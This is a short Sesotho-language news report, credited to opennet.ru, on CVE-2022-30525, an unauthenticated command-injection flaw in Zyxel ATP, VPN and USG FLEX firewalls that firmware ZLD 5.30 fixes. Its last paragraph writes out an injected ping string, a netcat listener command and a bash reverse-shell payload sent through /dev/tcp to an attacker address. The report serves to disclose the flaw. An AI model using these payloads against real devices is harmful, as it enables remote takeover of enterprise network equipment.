Ts'ireletso e matla (CVE-2022-30525) e fumanoe lisebelisoa tsa Zyxel tsa letoto la ATP, VPN le USG FLEX, tse etselitsoeng ho hlophisa ts'ebetso ea li-firewall, IDS le VPN likhoebong, tse lumellang mohlaseli oa kantle ho etsa khoutu ho. sesebediswa ntle le ditokelo tsa mosebedisi ntle le netefatso. Ho etsa tlhaselo, mohlaseli o tlameha ho khona ho romella likopo ho sesebelisoa a sebelisa protocol ea HTTP/HTTPS. Zyxel e hlophisitse ho ba kotsing ho ntlafatso ea firmware ea ZLD 5.30. Ho latela ts'ebeletso ea Shodan, hajoale ho na le lisebelisoa tse 16213 tse ka bang tlokotsing marang-rang a lefats'e a amohelang likopo ka HTTP/HTTPS.
Ts'ebetso e etsoa ka ho romella litaelo tse etselitsoeng ka ho khetheha ho motshwari oa webo /ztp/cgi-bin/handler, e fumanehang ntle le netefatso. Bothata bo bakoa ke khaello ea tlhoekiso e nepahetseng ea litekanyetso tsa kopo ha ho etsoa litaelo ho sistimi e sebelisang mohala oa os.system o sebelisitsoeng laebraring ea lib_wan_settings.py le ho etsoa ha ho sebetsoa ts'ebetso ea setWanPortSt.
Ka mohlala, mohlaseli a ka fetisa khoele “; ping 192.168.1.210;" e leng se tla lebisa ho ts'ebetsong ea taelo ea "ping 192.168.1.210" tsamaisong. Ho fihlella khetla ea taelo, o ka matha "nc -lvnp 1270" ho sistimi ea hau, ebe o qala khokahano e ka morao ka ho romella kopo ho sesebelisoa ka '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru